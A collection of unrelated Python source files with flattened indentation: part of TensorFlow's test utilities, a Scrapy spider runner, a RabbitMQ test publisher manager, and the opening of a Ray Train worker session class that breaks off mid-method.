elsewhere in the unit test file will not work). Additionally, checks that
nothing still has a reference to Tensors that the test allocated.
Returns:
Returns a decorator that will run the decorated test function
using both a graph and using eager execution.
"""
assert not __unused__, "Add () after run_in_graph_and_eager_modes."
def decorator(f):
"""Test method decorator."""
def decorated(self, **kwargs):
"""Decorated the test method."""
with context.graph_mode():
with self.test_session(graph, config, use_gpu, force_gpu):
f(self, **kwargs)
if reset_test:
# This decorator runs the wrapped test twice.
# Reset the test environment between runs.
self.tearDown()
self.setUp()
def run_eager_mode(self, **kwargs):
if force_gpu:
gpu_name = gpu_device_name()
if not gpu_name:
gpu_name = "/device:GPU:0"
with context.device(gpu_name):
f(self)
elif use_gpu:
# TODO(xpan): Support softplacement and gpu by default when available.
f(self, **kwargs)
else:
with context.device("/device:CPU:0"):
f(self, **kwargs)
if assert_no_eager_garbage:
run_eager_mode = assert_no_new_tensors(
assert_no_garbage_created(run_eager_mode))
with context.eager_mode():
with ops.Graph().as_default():
run_eager_mode(self, **kwargs)
return decorated
return decorator
@tf_export("test.is_gpu_available")
def is_gpu_available(cuda_only=False, min_cuda_compute_capability=None):
"""Returns whether TensorFlow can access a GPU.
Args:
cuda_only: limit the search to CUDA gpus.
min_cuda_compute_capability: a (major,minor) pair that indicates the minimum
CUDA compute capability required, or None if no requirement.
Returns:
True iff a gpu device of the requested kind is available.
"""
def compute_capability_from_device_desc(device_desc):
# TODO(jingyue): The device description generator has to be in sync with
# this file. Another option is to put compute capability in
# DeviceAttributes, but I avoided that to keep DeviceAttributes
# target-independent. Reconsider this option when we have more things like
# this to keep in sync.
# LINT.IfChange
match = re.search(r"compute capability: (\d+)\.(\d+)", device_desc)
# LINT.ThenChange(//tensorflow/core/\
# common_runtime/gpu/gpu_device.cc)
if not match:
return 0, 0
return int(match.group(1)), int(match.group(2))
for local_device in device_lib.list_local_devices():
if local_device.device_type == "GPU":
if (min_cuda_compute_capability is None or
compute_capability_from_device_desc(local_device.physical_device_desc)
>= min_cuda_compute_capability):
return True
if local_device.device_type == "SYCL" and not cuda_only:
return True
return False
@contextlib.contextmanager
def device(use_gpu):
"""Uses gpu when requested and available."""
if use_gpu and is_gpu_available():
dev = "/device:GPU:0"
else:
dev = "/device:CPU:0"
with ops.device(dev):
yield
@tf_export("test.TestCase")
class TensorFlowTestCase(googletest.TestCase):
"""Base class for tests that need to test TensorFlow.
"""
def __init__(self, methodName="runTest"): # pylint: disable=invalid-name
super(TensorFlowTestCase, self).__init__(methodName)
self._threads = []
self._tempdir = None
self._cached_session = None
def setUp(self):
self._ClearCachedSession()
random.seed(random_seed.DEFAULT_GRAPH_SEED)
np.random.seed(random_seed.DEFAULT_GRAPH_SEED)
# Note: The following line is necessary because some test methods may error
# out from within nested graph contexts (e.g., via assertRaises and
# assertRaisesRegexp), which may leave ops._default_graph_stack non-empty
# under certain versions of Python. That would cause
# ops.reset_default_graph() to throw an exception if the stack were not
# cleared first.
ops._default_graph_stack.reset() # pylint: disable=protected-access
ops.reset_default_graph()
random_seed.set_random_seed(random_seed.DEFAULT_GRAPH_SEED)
def tearDown(self):
for thread in self._threads:
thread.check_termination()
self._ClearCachedSession()
def _ClearCachedSession(self):
if self._cached_session is not None:
self._cached_session.close()
self._cached_session = None
def get_temp_dir(self):
"""Returns a unique temporary directory for the test to use.
If you call this method multiple times during in a test, it will return the
same folder. However, across different runs the directories will be
different. This will ensure that across different runs tests will not be
able to pollute each others environment.
If you need multiple unique directories within a single test, you should
use tempfile.mkdtemp as follows:
tempfile.mkdtemp(dir=self.get_temp_dir()):
Returns:
string, the path to the unique temporary directory created for this test.
"""
if not self._tempdir:
self._tempdir = tempfile.mkdtemp(dir=googletest.GetTempDir())
return self._tempdir
def _AssertProtoEquals(self, a, b, msg=None):
"""Asserts that a and b are the same proto.
Uses ProtoEq() first, as it returns correct results
for floating point attributes, and then use assertProtoEqual()
in case of failure as it provides good error messages.
Args:
a: a proto.
b: another proto.
msg: Optional message to report on failure.
"""
if not compare.ProtoEq(a, b):
compare.assertProtoEqual(self, a, b, normalize_numbers=True, msg=msg)
def assertProtoEquals(self, expected_message_maybe_ascii, message, msg=None):
"""Asserts that message is same as parsed expected_message_ascii.
Creates another prototype of message, reads the ascii message into it and
then compares them using self._AssertProtoEqual().
Args:
expected_message_maybe_ascii: proto message in original or ascii form.
message: the message to validate.
msg: Optional message to report on failure.
"""
msg = msg if msg else ""
if isinstance(expected_message_maybe_ascii, type(message)):
expected_message = expected_message_maybe_ascii
self._AssertProtoEquals(expected_message, message)
elif isinstance(expected_message_maybe_ascii, str):
expected_message = type(message)()
text_format.Merge(
expected_message_maybe_ascii,
expected_message,
descriptor_pool=descriptor_pool.Default())
self._AssertProtoEquals(expected_message, message, msg=msg)
else:
assert False, ("Can't compare protos of type %s and %s. %s" %
(type(expected_message_maybe_ascii), type(message), msg))
def assertProtoEqualsVersion(
self,
expected,
actual,
producer=versions.GRAPH_DEF_VERSION,
min_consumer=versions.GRAPH_DEF_VERSION_MIN_CONSUMER,
msg=None):
expected = "versions { producer: %d min_consumer: %d };\n%s" % (
producer, min_consumer, expected)
self.assertProtoEquals(expected, actual, msg=msg)
def assertStartsWith(self, actual, expected_start, msg=None):
"""Assert that actual.startswith(expected_start) is True.
Args:
actual: str
expected_start: str
msg: Optional message to report on failure.
"""
if not actual.startswith(expected_start):
fail_msg = "%r does not start with %r" % (actual, expected_start)
fail_msg += " : %r" % (msg) if msg else ""
self.fail(fail_msg)
def _eval_tensor(self, tensor):
if tensor is None:
return None
elif isinstance(tensor, ops.EagerTensor):
return tensor.numpy()
elif isinstance(tensor, resource_variable_ops.ResourceVariable):
return tensor.read_value().numpy()
elif callable(tensor):
return self._eval_helper(tensor())
else:
raise ValueError("Unsupported type %s." % type(tensor))
def _eval_helper(self, tensors):
if tensors is None:
return None
return nest.map_structure(self._eval_tensor, tensors)
def evaluate(self, tensors):
"""Evaluates tensors and returns numpy values.
Args:
tensors: A Tensor or a nested list/tuple of Tensors.
Returns:
tensors numpy values.
"""
if context.in_eager_mode():
return self._eval_helper(tensors)
else:
sess = ops.get_default_session()
if sess is None:
with self.test_session() as sess:
return sess.run(tensors)
else:
return sess.run(tensors)
# pylint: disable=g-doc-return-or-yield
@contextlib.contextmanager
def test_session(self,
graph=None,
config=None,
use_gpu=False,
force_gpu=False):
"""Returns a TensorFlow Session for use in executing tests.
This method should be used for all functional tests.
This method behaves different than session.Session: for performance reasons
`test_session` will by default (if `graph` is None) reuse the same session
across tests. This means you may want to either call the function
`reset_default_graph()` before tests, or if creating an explicit new graph,
pass it here (simply setting it with `as_default()` won't do it), which will
trigger the creation of a new session.
Use the `use_gpu` and `force_gpu` options to control where ops are run. If
`force_gpu` is True, all ops are pinned to `/device:GPU:0`. Otherwise, if
`use_gpu`
is True, TensorFlow tries to run as many ops on the GPU as possible. If both
`force_gpu and `use_gpu` are False, all ops are pinned to the CPU.
Example:
```python
class MyOperatorTest(test_util.TensorFlowTestCase):
def testMyOperator(self):
with self.test_session(use_gpu=True):
valid_input = [1.0, 2.0, 3.0, 4.0, 5.0]
result = MyOperator(valid_input).eval()
self.assertEqual(result, [1.0, 2.0, 3.0, 5.0, 8.0]
invalid_input = [-1.0, 2.0, 7.0]
with self.assertRaisesOpError("negative input not supported"):
MyOperator(invalid_input).eval()
```
Args:
graph: Optional graph to use during the returned session.
config: An optional config_pb2.ConfigProto to use to configure the
session.
use_gpu: If True, attempt to run as many ops as possible on GPU.
force_gpu: If True, pin all ops to `/device:GPU:0`.
Returns:
A Session object that should be used as a context manager to surround
the graph building and execution code in a test case.
"""
if self.id().endswith(".test_session"):
self.skipTest("Not a test.")
def prepare_config(config):
"""Returns a config for sessions.
Args:
config: An optional config_pb2.ConfigProto to use to configure the
session.
Returns:
A config_pb2.ConfigProto object.
"""
if config is None:
config = config_pb2.ConfigProto()
config.allow_soft_placement = not force_gpu
config.gpu_options.per_process_gpu_memory_fraction = 0.3
elif force_gpu and config.allow_soft_placement:
config = config_pb2.ConfigProto().CopyFrom(config)
config.allow_soft_placement = False
# Don't perform optimizations for tests so we don't inadvertently run
# gpu ops on cpu
config.graph_options.optimizer_options.opt_level = -1
config.graph_options.rewrite_options.constant_folding = (
rewriter_config_pb2.RewriterConfig.OFF)
config.graph_options.rewrite_options.arithmetic_optimization = (
rewriter_config_pb2.RewriterConfig.OFF)
return config
if graph is None:
if self._cached_session is None:
self._cached_session = session.Session(
graph=None, config=prepare_config(config))
sess = self._cached_session
with sess.graph.as_default(), sess.as_default():
if force_gpu:
# Use the name of an actual device if one is detected, or '/device:GPU:0'
# otherwise
gpu_name = gpu_device_name()
if not gpu_name:
gpu_name = "/device:GPU:0"
with sess.graph.device(gpu_name):
yield sess
elif use_gpu:
yield sess
else:
with sess.graph.device("/cpu:0"):
yield sess
else:
with session.Session(graph=graph, config=prepare_config(config)) as sess:
if force_gpu:
# Use the name of an actual device if one is detected, or '/device:GPU:0'
# otherwise
gpu_name = gpu_device_name()
if not gpu_name:
gpu_name = "/device:GPU:0"
with sess.graph.device(gpu_name):
yield sess
elif use_gpu:
yield sess
else:
with sess.graph.device("/cpu:0"):
yield sess
# pylint: enable=g-doc-return-or-yield
class _CheckedThread(object):
"""A wrapper class for Thread that asserts successful completion.
This class should be created using the TensorFlowTestCase.checkedThread()
method.
"""
def __init__(self, testcase, target, args=None, kwargs=None):
"""Constructs a new instance of _CheckedThread.
Args:
testcase: The TensorFlowTestCase for which this thread is being created.
target: A callable object representing the code to be executed in the
thread.
args: A tuple of positional arguments that will be passed to target.
kwargs: A dictionary of keyword arguments that will be passed to target.
"""
self._testcase = testcase
self._target = target
self._args = () if args is None else args
self._kwargs = {} if kwargs is None else kwargs
self._thread = threading.Thread(target=self._protected_run)
self._exception = None
self._is_thread_joined = False
def _protected_run(self):
"""Target for the wrapper thread. Sets self._exception on failure."""
try:
self._target(*self._args, **self._kwargs)
except Exception as e: # pylint: disable=broad-except
self._exception = e
def start(self):
"""Starts the thread's activity.
This must be called at most once per _CheckedThread object. It arranges
for the object's target to be invoked in a separate thread of control.
"""
self._thread.start()
def join(self):
"""Blocks until the thread terminates.
Raises:
self._testcase.failureException: If the thread terminates with due to
an exception.
"""
self._is_thread_joined = True
self._thread.join()
if self._exception is not None:
self._testcase.fail("Error in checkedThread: %s" % str(self._exception))
def is_alive(self):
"""Returns whether the thread is alive.
This method returns True just before the run() method starts
until just after the run() method terminates.
Returns:
True if the thread is alive, otherwise False.
"""
return self._thread.is_alive()
def check_termination(self):
"""Returns whether the checked thread was properly used and did terminate.
Every checked thread should be "join"ed after starting, and before the
test tears down. If it is not joined, it is possible the thread will hang
and cause flaky failures in tests.
Raises:
self._testcase.failureException: If check_termination was called before
thread was joined.
RuntimeError: If the thread is not terminated. This means thread was not
joined with the main thread.
"""
if self._is_thread_joined:
if self.is_alive():
raise RuntimeError(
"Thread was not joined with main thread, and is still running "
"when the test finished.")
else:
self._testcase.fail("A checked thread was not joined.")
def checkedThread(self, target, args=None, kwargs=None):
"""Returns a Thread wrapper that asserts 'target' completes successfully.
This method should be used to create all threads in test cases, as
otherwise there is a risk that a thread will silently fail, and/or
assertions made in the thread will not be respected.
Args:
target: A callable object to be executed in the thread.
args: The argument tuple for the target invocation. Defaults to ().
kwargs: A dictionary of keyword arguments for the target invocation.
Defaults to {}.
Returns:
A wrapper for threading.Thread that supports start() and join() methods.
"""
ret = TensorFlowTestCase._CheckedThread(self, target, args, kwargs)
self._threads.append(ret)
return ret
# pylint: enable=invalid-name
def assertNear(self, f1, f2, err, msg=None):
"""Asserts that two floats are near each other.
Checks that |f1 - f2| < err and asserts a test failure
if not.
Args:
f1: A float value.
f2: A float value.
err: A float value.
msg: An optional string message to append to the failure message.
"""
# f1 == f2 is needed here as we might have: f1, f2 = inf, inf
self.assertTrue(f1 == f2 or math.fabs(f1 - f2) <= err,
"%f != %f +/- %f%s" % (f1, f2, err, " (%s)" % msg
if msg is not None else ""))
def assertArrayNear(self, farray1, farray2, err, msg=None):
"""Asserts that two float arrays are near each other.
Checks that for all elements of farray1 and farray2
|f1 - f2| < err. Asserts a test failure if not.
Args:
farray1: a list of float values.
farray2: a list of float values.
err: a float value.
msg: Optional message to report on failure.
"""
self.assertEqual(len(farray1), len(farray2), msg=msg)
for f1, f2 in zip(farray1, farray2):
self.assertNear(float(f1), float(f2), err, msg=msg)
def _NDArrayNear(self, ndarray1, ndarray2, err):
return np.linalg.norm(ndarray1 - ndarray2) < err
def assertNDArrayNear(self, ndarray1, ndarray2, err, msg=None):
"""Asserts that two numpy arrays have near values.
Args:
ndarray1: a numpy ndarray.
ndarray2: a numpy ndarray.
err: a float. The maximum absolute difference allowed.
msg: Optional message to report on failure.
"""
self.assertTrue(self._NDArrayNear(ndarray1, ndarray2, err), msg=msg)
def _GetNdArray(self, a):
if not isinstance(a, np.ndarray):
a = np.array(a)
return a
def _assertArrayLikeAllClose(self, a, b, rtol=1e-6, atol=1e-6, msg=None):
a = self._GetNdArray(a)
b = self._GetNdArray(b)
self.assertEqual(a.shape, b.shape, "Shape mismatch: expected %s, got %s." %
(a.shape, b.shape))
if not np.allclose(a, b, rtol=rtol, atol=atol):
# Prints more details than np.testing.assert_allclose.
#
# NOTE: numpy.allclose (and numpy.testing.assert_allclose)
# checks whether two arrays are element-wise equal within a
# tolerance. The relative difference (rtol * abs(b)) and the
# absolute difference atol are added together to compare against
# the absolute difference between a and b. Here, we want to
# print out which elements violate such conditions.
cond = np.logical_or(
np.abs(a - b) > atol + rtol * np.abs(b),
np.isnan(a) != np.isnan(b))
if a.ndim:
x = a[np.where(cond)]
y = b[np.where(cond)]
print("not close where = ", np.where(cond))
else:
# np.where is broken for scalars
x, y = a, b
print("not close lhs = ", x)
print("not close rhs = ", y)
print("not close dif = ", np.abs(x - y))
print("not close tol = ", atol + rtol * np.abs(y))
print("dtype = %s, shape = %s" % (a.dtype, a.shape))
# TODO(xpan): There seems to be a bug:
# tensorflow/compiler/tests:binary_ops_test pass with float32
# nan even though the equal_nan is False by default internally.
np.testing.assert_allclose(
a, b, rtol=rtol, atol=atol, err_msg=msg, equal_nan=True)
def _assertAllCloseRecursive(self,
a,
b,
rtol=1e-6,
atol=1e-6,
path=None,
msg=None):
path = path or []
path_str = (("[" + "][".join([str(p) for p in path]) + "]") if path else "")
msg = msg if msg else ""
# Check if a and/or b are namedtuples.
if hasattr(a, "_asdict"):
a = a._asdict()
if hasattr(b, "_asdict"):
b = b._asdict()
a_is_dict = isinstance(a, dict)
if a_is_dict != isinstance(b, dict):
raise ValueError("Can't compare dict to non-dict, a%s vs b%s. %s" %
(path_str, path_str, msg))
if a_is_dict:
self.assertItemsEqual(
a.keys(),
b.keys(),
msg="mismatched keys: a%s has keys %s, but b%s has keys %s. %s" %
(path_str, a.keys(), path_str, b.keys(), msg))
for k in a:
path.append(k)
self._assertAllCloseRecursive(
a[k], b[k], rtol=rtol, atol=atol, path=path, msg=msg)
del path[-1]
elif isinstance(a, (list, tuple)):
# Try to directly compare a, b as ndarrays; if not work, then traverse
# through the sequence, which is more expensive.
try:
a_as_ndarray = np.array(a)
b_as_ndarray = np.array(b)
self._assertArrayLikeAllClose(
a_as_ndarray,
b_as_ndarray,
rtol=rtol,
atol=atol,
msg="Mismatched value: a%s is different from b%s. %s" %
(path_str, path_str, msg))
except (ValueError, TypeError) as e:
if len(a) != len(b):
raise ValueError(
"Mismatched length: a%s has %d items, but b%s has %d items. %s" %
(path_str, len(a), path_str, len(b), msg))
for idx, (a_ele, b_ele) in enumerate(zip(a, b)):
path.append(str(idx))
self._assertAllCloseRecursive(
a_ele, b_ele, rtol=rtol, atol=atol, path=path, msg=msg)
del path[-1]
# a and b are ndarray like objects
else:
try:
self._assertArrayLikeAllClose(
a,
b,
rtol=rtol,
atol=atol,
msg="Mismatched value: a%s is different from b%s." % (path_str,
path_str))
except TypeError as e:
msg = "Error: a%s has %s, but b%s has %s" % (
path_str, type(a), path_str, type(b))
e.args = ((e.args[0] + ' : ' + msg,) + e.args[1:])
raise
def assertAllClose(self, a, b, rtol=1e-6, atol=1e-6, msg=None):
"""Asserts that two structures of numpy arrays, have near values.
`a` and `b` can be arbitrarily nested structures. A layer of a nested
structure can be a `dict`, `namedtuple`, `tuple` or `list`.
Args:
a: The expected numpy `ndarray`, or anything that can be converted into a
numpy `ndarray`, or any arbitrarily nested of structure of these.
b: The actual numpy `ndarray`, or anything that can be converted into a
numpy `ndarray`, or any arbitrarily nested of structure of these.
rtol: relative tolerance.
atol: absolute tolerance.
msg: Optional message to report on failure.
Raises:
ValueError: if only one of `a[p]` and `b[p]` is a dict or
`a[p]` and `b[p]` have different length, where `[p]` denotes a path
to the nested structure, e.g. given `a = [(1, 1), {'d': (6, 7)}]` and
`[p] = [1]['d']`, then `a[p] = (6, 7)`.
"""
self._assertAllCloseRecursive(a, b, rtol=rtol, atol=atol, msg=msg)
def assertAllCloseAccordingToType(self,
a,
b,
rtol=1e-6,
atol=1e-6,
float_rtol=1e-6,
float_atol=1e-6,
half_rtol=1e-3,
half_atol=1e-3,
bfloat16_rtol=1e-2,
bfloat16_atol=1e-2,
msg=None):
"""Like assertAllClose, but also suitable for comparing fp16 arrays.
In particular, the tolerance is reduced to 1e-3 if at least
one of the arguments is of type float16.
Args:
a: the expected numpy ndarray or anything can be converted to one.
b: the actual numpy ndarray or anything can be converted to one.
rtol: relative tolerance.
atol: absolute tolerance.
float_rtol: relative tolerance for float32.
float_atol: absolute tolerance for float32.
half_rtol: relative tolerance for float16.
half_atol: absolute tolerance for float16.
bfloat16_rtol: relative tolerance for bfloat16.
bfloat16_atol: absolute tolerance for bfloat16.
msg: Optional message to report on failure.
"""
a = self._GetNdArray(a)
b = self._GetNdArray(b)
# types with lower tol are put later to overwrite previous ones.
if (a.dtype == np.float32 or b.dtype == np.float32 or
a.dtype == np.complex64 or b.dtype == np.complex64):
rtol = max(rtol, float_rtol)
atol = max(atol, float_atol)
if a.dtype == np.float16 or b.dtype == np.float16:
rtol = max(rtol, half_rtol)
atol = max(atol, half_atol)
if (a.dtype == dtypes.bfloat16.as_numpy_dtype or
b.dtype == dtypes.bfloat16.as_numpy_dtype):
rtol = max(rtol, bfloat16_rtol)
atol = max(atol, bfloat16_atol)
self.assertAllClose(a, b, rtol=rtol, atol=atol, msg=msg)
def assertAllEqual(self, a, b, msg=None):
"""Asserts that two numpy arrays have the same values.
Args:
a: the expected numpy ndarray or anything can be converted to one.
b: the actual numpy ndarray or anything can be converted to one.
msg: Optional message to report on failure.
"""
msg = msg if msg else ""
a = self._GetNdArray(a)
b = self._GetNdArray(b)
self.assertEqual(a.shape, b.shape, "Shape mismatch: expected %s, got %s."
" %s" % (a.shape, b.shape, msg))
same = (a == b)
if a.dtype == np.float32 or a.dtype == np.float64:
same = np.logical_or(same, np.logical_and(np.isnan(a), np.isnan(b)))
if not np.all(same):
# Prints more details than np.testing.assert_array_equal.
diff = np.logical_not(same)
if a.ndim:
x = a[np.where(diff)]
y = b[np.where(diff)]
print("not equal where = ", np.where(diff))
else:
# np.where is broken for scalars
x, y = a, b
print("not equal lhs = ", x)
print("not equal rhs = ", y)
np.testing.assert_array_equal(a, b, err_msg=msg)
# pylint: disable=g-doc-return-or-yield
@contextlib.contextmanager
def assertRaisesWithPredicateMatch(self, exception_type,
expected_err_re_or_predicate):
"""Returns a context manager to enclose code expected to raise an exception.
If the exception is an OpError, the op stack is also included in the message
predicate search.
Args:
exception_type: The expected type of exception that should be raised.
expected_err_re_or_predicate: If this is callable, it should be a function
of one argument that inspects the passed-in exception and
returns True (success) or False (please fail the test). Otherwise, the
error message is expected to match this regular expression partially.
Returns:
A context manager to surround code that is expected to raise an
exception.
"""
if callable(expected_err_re_or_predicate):
predicate = expected_err_re_or_predicate
else:
def predicate(e):
err_str = e.message if isinstance(e, errors.OpError) else str(e)
op = e.op if isinstance(e, errors.OpError) else None
while op is not None:
err_str += "\nCaused by: " + op.name
op = op._original_op # pylint: disable=protected-access
logging.info("Searching within error strings: '%s' within '%s'",
expected_err_re_or_predicate, err_str)
return re.search(expected_err_re_or_predicate, err_str)
try:
yield
self.fail(exception_type.__name__ + " not raised")
except Exception as e: # pylint: disable=broad-except
if not isinstance(e, exception_type) or not predicate(e):
raise AssertionError("Exception of type %s: %s" % (str(type(e)),
str(e)))
# pylint: enable=g-doc-return-or-yield
def assertRaisesOpError(self, expected_err_re_or_predicate):
return self.assertRaisesWithPredicateMatch(errors.OpError,
expected_err_re_or_predicate)
def assertShapeEqual(self, np_array, tf_tensor, msg=None):
"""Asserts that a Numpy ndarray and a TensorFlow tensor have the same shape.
Args:
np_array: A Numpy ndarray or Numpy scalar.
tf_tensor: A Tensor.
msg: Optional message to report on failure.
Raises:
TypeError: If the arguments have the wrong type.
"""
if not isinstance(np_array, (np.ndarray, np.generic)):
raise TypeError("np_array must be a Numpy ndarray or Numpy scalar")
if not isinstance(tf_tensor, ops.Tensor):
raise TypeError("tf_tensor must be a Tensor")
self.assertAllEqual(
np_array.shape, tf_tensor.get_shape().as_list(), msg=msg)
def assertDeviceEqual(self, device1, device2, msg=None):
"""Asserts that the two given devices are the same.
Args:
device1: A string device name or TensorFlow `DeviceSpec` object.
device2: A string device name or TensorFlow `DeviceSpec` object.
msg: Optional message to report on failure.
"""
device1 = pydev.canonical_name(device1)
device2 = pydev.canonical_name(device2)
self.assertEqual(device1, device2,
"Devices %s and %s are not equal. %s" %
(device1, device2, msg))
# Fix Python 3 compatibility issues
if six.PY3:
# pylint: disable=invalid-name
# Silence a deprecation warning
assertRaisesRegexp = googletest.TestCase.assertRaisesRegex
# assertItemsEqual is assertCountEqual as of 3.2.
assertItemsEqual = googletest.TestCase.assertCountEqual
# pylint: enable=invalid-name
@tf_export("test.create_local_cluster")
def create_local_cluster(num_workers,
num_ps,
protocol="grpc",
worker_config=None,
ps_config=None):
"""Create and start local servers and return the associated `Server` objects.
Example:
```python
workers, _ = tf.test.create_local_cluster(num_workers=2, num_ps=2)
worker_sessions = [tf.Session(w.target) for w in workers]
with tf.device("/job:ps/task:0"):
...
with tf.device("/job:ps/task:1"):
...
with tf.device("/job:worker/task:0"):
...
with tf.device("/job:worker/task:1"):
...
worker_sessions[0].run(...)
```
Args:
num_workers: Number of worker servers to start.
num_ps: Number of PS servers to start.
protocol: Communication protocol. Allowed values are documented in
the documentation of `tf.train.Server`.
worker_config: (optional) ConfigProto to initialize workers. Can be used
to instantiate multiple devices etc.
ps_config: (optional) ConfigProto to initialize PS servers.
Returns:
A tuple `(worker_servers, ps_servers)`. `worker_servers` is a list
of `num_workers` objects of type `tf.train.Server` (all running locally);
and `ps_servers` is a list of `num_ps` objects of similar type.
Raises:
ImportError: if portpicker module was not found at load time
"""
if _portpicker_import_error:
raise _portpicker_import_error # pylint: disable=raising-bad-type
worker_ports = [portpicker.pick_unused_port() for _ in range(num_workers)]
ps_ports = [portpicker.pick_unused_port() for _ in range(num_ps)]
cluster_dict = {
"worker": ["localhost:%s" % port for port in worker_ports],
"ps": ["localhost:%s" % port for port in ps_ports]
}
cs = server_lib.ClusterSpec(cluster_dict)
workers = [
server_lib.Server(
cs,
job_name="worker",
protocol=protocol,
task_index=ix,
config=worker_config,
start=True) for ix in range(num_workers)
]
ps_servers = [
server_lib.Server(
cs,
job_name="ps",
protocol=protocol,
task_index=ix,
config=ps_config,
start=True) for ix in range(num_ps)
]
return workers, ps_servers
def get_node_def_from_graph(node_name, graph_def):
"""Returns the `NodeDef` instance for given node name in the graph def.
This method explores only the NodeDefs in `graph_def.node`.
Args:
node_name: Name of the NodeDef to search for.
graph_def: An instance of `GraphDef` proto.
Returns:
the `NodeDef` instance whose name field matches the given node_name or None.
"""
for node_def in graph_def.node:
if node_def.name == node_name:
return node_def
return None
def set_producer_version(graph, producer_version):
"""Sets graph.graph_def_versions.producer to `producer_version`."""
# The C API doesn't expose altering GraphDefVersions. We can indirectly set
# it via import_graph_def though.
graph_def = graph_pb2.GraphDef()
graph_def.versions.producer = producer_version
with graph.as_default():
importer.import_graph_def(graph_def)
assert graph.graph_def_versions.producer, producer_version
|
utilities.py
|
from src.sources import *
from scrapy.crawler import CrawlerRunner
from multiprocessing import Process
from twisted.internet import reactor
def run_spider(spider,source_information):
def f():
runner = CrawlerRunner()
deferred = runner.crawl(spider,source_information = source_information)
deferred.addBoth(lambda _: reactor.stop())
reactor.run()
p = Process(target=f)
p.start()
p.join()
|
PublisherManager.py
|
from RabbitPublisher import RabbitPublisher
from printer import console_out
import threading
class PublisherManager:
def __init__(self, broker_manager, test_number, actor, publisher_count, in_flight_max, print_mod):
self.broker_manager = broker_manager
self.test_number = test_number
self.publishers = list()
self.publisher_threads = list()
self.actor = actor
self.publisher_count = publisher_count
self.in_flight_max = in_flight_max
self.print_mod = print_mod
def add_sequence_direct_publishers(self, queue_name, count, dup_rate, sequence_count):
for pub_id in range (1, self.publisher_count+1):
publisher = RabbitPublisher(pub_id, self.test_number, self.broker_manager, self.in_flight_max, 120, self.print_mod)
publisher.configure_sequence_direct(queue_name, count, dup_rate, sequence_count)
self.publishers.append(publisher)
def add_large_msgs_direct_publishers(self, queue_name, count, dup_rate, msg_size):
for pub_id in range (1, self.publisher_count+1):
publisher = RabbitPublisher(pub_id, self.test_number, self.broker_manager, self.in_flight_max, 120, self.print_mod)
publisher.configure_large_msgs_direct(queue_name, count, dup_rate, msg_size)
self.publishers.append(publisher)
def add_hello_msgs_direct_publishers(self, queue_name, count, dup_rate):
for pub_id in range (1, self.publisher_count+1):
publisher = RabbitPublisher(pub_id, self.test_number, self.broker_manager, self.in_flight_max, 120, self.print_mod)
publisher.configure_hello_msgs_direct(queue_name, count, dup_rate)
self.publishers.append(publisher)
def add_sequence_to_exchanges_publishers(self, exchanges, routing_key, count, dup_rate, sequence_count):
for pub_id in range (1, self.publisher_count+1):
publisher = RabbitPublisher(pub_id, self.test_number, self.broker_manager, self.in_flight_max, 120, self.print_mod)
publisher.configure_sequence_to_exchanges(exchanges, routing_key, count, dup_rate, sequence_count)
self.publishers.append(publisher)
def add_partitioned_sequence_to_exchanges_publishers(self, exchanges, count, dup_rate, sequence_count):
for pub_id in range (1, self.publisher_count+1):
publisher = RabbitPublisher(pub_id, self.test_number, self.broker_manager, self.in_flight_max, 120, self.print_mod)
publisher.configure_partitioned_sequence_to_exchanges(exchanges, count, dup_rate, sequence_count)
self.publishers.append(publisher)
def add_large_msgs_to_exchanges_publishers(self, exchanges, routing_key, count, dup_rate, msg_size):
for pub_id in range (1, self.publisher_count+1):
publisher = RabbitPublisher(pub_id, self.test_number, self.broker_manager, self.in_flight_max, 120, self.print_mod)
publisher.configure_large_msgs_to_exchanges(exchanges, routing_key, count, dup_rate, msg_size)
self.publishers.append(publisher)
def add_hello_msgs_to_exchanges_publishers(self, exchanges, routing_key, count, dup_rate):
for pub_id in range (1, self.publisher_count+1):
publisher = RabbitPublisher(pub_id, self.test_number, self.broker_manager, self.in_flight_max, 120, self.print_mod)
publisher.configure_hello_msgs_to_exchanges(exchanges, routing_key, count, dup_rate)
self.publishers.append(publisher)
def start_publishers(self):
for prod_id in range(1, len(self.publishers)+1):
pub_thread = threading.Thread(target=self.publishers[prod_id-1].start_publishing)
pub_thread.start()
self.publisher_threads.append(pub_thread)
console_out(f"Publisher {prod_id} started", self.actor)
def stop_all_publishers(self):
for publisher in self.publishers:
publisher.stop_publishing()
for pub_thread in self.publisher_threads:
pub_thread.join(10)
def get_total_msg_set(self):
all = set()
for publisher in self.publishers:
all = all.union(publisher.get_msg_set())
return all
def get_total_pos_ack_count(self):
total = 0
for publisher in self.publishers:
total += publisher.get_pos_ack_count()
return total
def get_total_neg_ack_count(self):
total = 0
for publisher in self.publishers:
total += publisher.get_neg_ack_count()
return total
|
session.py
|
import os
import platform
import queue
import threading
import time
from datetime import datetime
from dataclasses import dataclass
from enum import Enum, auto
from typing import Callable
from typing import Optional, Dict
import warnings
import ray
from ray.train.constants import (
DETAILED_AUTOFILLED_KEYS, TIME_THIS_ITER_S, PID, TIMESTAMP, TIME_TOTAL_S,
NODE_IP, TRAINING_ITERATION, HOSTNAME, DATE, RESULT_FETCH_TIMEOUT)
from ray.train.utils import PropagatingThread, RayDataset
from ray.util import PublicAPI
class TrainingResultType(Enum):
REPORT = auto()
CHECKPOINT = auto()
@dataclass
class TrainingResult:
type: TrainingResultType
data: Dict
class Session:
"""Holds information for training on each worker."""
def __init__(self,
training_func: Callable,
world_rank: int,
local_rank: int,
world_size: int,
dataset_shard: Optional[RayDataset] = None,
checkpoint: Optional[Dict] = None,
encode_data_fn: Callable = None,
detailed_autofilled_metrics: bool = False):
self.dataset_shard = dataset_shard
# The Thread object that is running the training function.
self.training_thread = PropagatingThread(
target=training_func, daemon=True)
self.world_rank = world_rank
self.local_rank = local_rank
self.world_size = world_size
self.loaded_checkpoint = checkpoint
# Function to encode checkpoint dict before sending to the driver.
if not encode_data_fn:
def noop(x):
return x
encode_data_fn = noop
self._encode_data_fn = encode_data_fn
# This lock is used to control the execution of the training thread.
self.continue_lock = threading.Semaphore(0)
# Queue for sending results across threads.
self.result_queue = queue.Queue(1)
# Autofilled metrics attributes.
self.detailed_autofilled_metrics = detailed_autofilled_metrics
self.last_report_time = time.time()
self.iteration = 0
self.time_total = 0.0
self.local_ip = self.get_current_ip()
self.ignore_report = False
self.training_started = False
def get_current_ip(self):
self.local_ip = ray.util.get_node_ip_address()
return self.local_ip
def start(self):
"""Starts the training thread."""
self.training_started = True
self.training_thread.start()
def pause_reporting(self):
"""Ignore all future ``train.report()`` calls."""
self.ignore_report = True
def finish(self):
"""Finishes the training thread.
Either returns the output from training or raises any Exception from
training.
"""
# Wait for training to finish.
